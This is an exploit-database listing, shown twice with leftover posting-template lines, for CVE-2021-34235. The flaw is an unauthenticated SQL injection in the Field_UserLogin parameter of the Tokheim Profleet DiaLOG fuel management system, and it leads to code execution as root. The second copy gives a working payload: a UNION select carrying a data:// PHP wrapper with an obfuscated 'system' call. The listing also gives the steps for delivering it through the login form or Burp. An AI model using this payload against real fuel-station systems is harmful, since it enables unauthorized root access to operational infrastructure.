Profleet DiaLOG Fuel Management System 11.005.02 SQLi ==> Code Execution Vulnerabilities
golem445:Risk [Security Risk Critical] 0day-ID-37341 # CVE: CVE-2021-34235 Category:web applications Date:10-02-2022 Platform:php
---------------------------------------------------------------------
# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)
# Exploit Author: golem445
# Vendor Homepage: https://www.tsg-solutions.com
# Tested on: Kali Linux
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.
==Steps to Reproduce==
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.
==Notes==
# This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.
# boom
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.
Download:
golem445:Risk [Security Risk Critical] 0day-ID-37341 # CVE: CVE-2021-34235 Category:web applications Date:10-02-2022 Platform:php
---------------------------------------------------------------------
# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)
# Exploit Author: golem445
# Vendor Homepage: https://www.tsg-solutions.com
# Tested on: Kali Linux
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.
==Steps to Reproduce==
Code:
# Go to : http://dialog_host/login.php
# Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.
==Notes==
# This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.
# boom
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.
Download:
